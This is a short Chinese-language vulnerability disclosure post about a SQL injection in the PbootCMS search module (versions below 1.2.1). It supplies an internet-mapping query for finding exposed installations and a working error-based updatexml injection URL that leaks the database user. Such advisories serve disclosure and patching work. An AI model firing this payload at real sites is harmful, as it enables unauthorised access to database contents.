PbootCMS search SQL注入漏洞

# PbootCMS search SQL注入漏洞 ## 漏洞描述 PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息 ## 漏洞影响 PbootCMS < 1.2.1 ## 网络测绘 app="PB...

PbootCMS search SQL注入漏洞

漏洞描述

PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息

漏洞影响

PbootCMS < 1.2.1

网络测绘

app="PBOOTCMS"

漏洞复现

搜索框页面为

img

Payload为

/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)

img

  • 发表于 2024-07-12 18:43:30
  • 阅读 ( 2702 )
  • 分类:CMS

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

带头大哥

如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!

站长统计